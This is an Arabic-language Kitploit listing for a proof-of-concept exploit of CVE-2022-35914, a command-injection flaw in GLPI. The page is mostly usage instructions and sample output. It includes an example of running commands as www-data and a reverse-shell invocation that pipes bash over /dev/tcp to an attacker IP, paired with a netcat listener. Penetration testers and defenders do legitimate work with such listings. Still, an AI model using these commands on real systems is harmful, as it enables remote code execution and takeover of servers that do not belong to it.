Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-35914 — استغلال إثبات المفهوم لـ GLPI - حقن الأوامر باستخدام سكريبت مكتبة طرف ثالث | Kitploit
أدوات/GitHubGitHub/senderend/cve-2022-35914
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubsenderend/cve-2022-35914

CVE-2022-35914

استغلال إثبات المفهوم لـ GLPI - حقن الأوامر باستخدام سكريبت مكتبة طرف ثالث

عرض المستودع
43منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-35914 PoC

المراجع

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
  • https://github.com/cosad3s/CVE-2022-35914-poc (شكر لـ Sébastien Copin على PoC الذي قمت بتكييفه هنا)

اطلع على مقالتي الكاملة هنا: https://link.medium.com/tBwDlpQl3Ib

الاستخدام

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
python3 CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL [-c CMD] [-f HOOK] [-b CALLBACK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help                  show this help message and exit
  -u URL                      URL to test
  -c CMD                      Command to launch (default: id)
  -f HOOK                     PHP hook function (default: array_map)
  -b CALLBACK                 PHP callback function (default: system)
  --check                     Just check, no command execution.
  --user-agent USER_AGENT     Custom User-Agent

مثال:

root@kitploit:~
python3 CVE-2022-35914.py -u http://glpi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

صدفة عكسية:

root@kitploit:~
python3 CVE-2022-35914.py -u http://192.168.249.242 -c 'bash -c "bash -i >& /dev/tcp/192.168.45.154/80 0>&1"'

nc -lvnp 80
تنزيل الأداة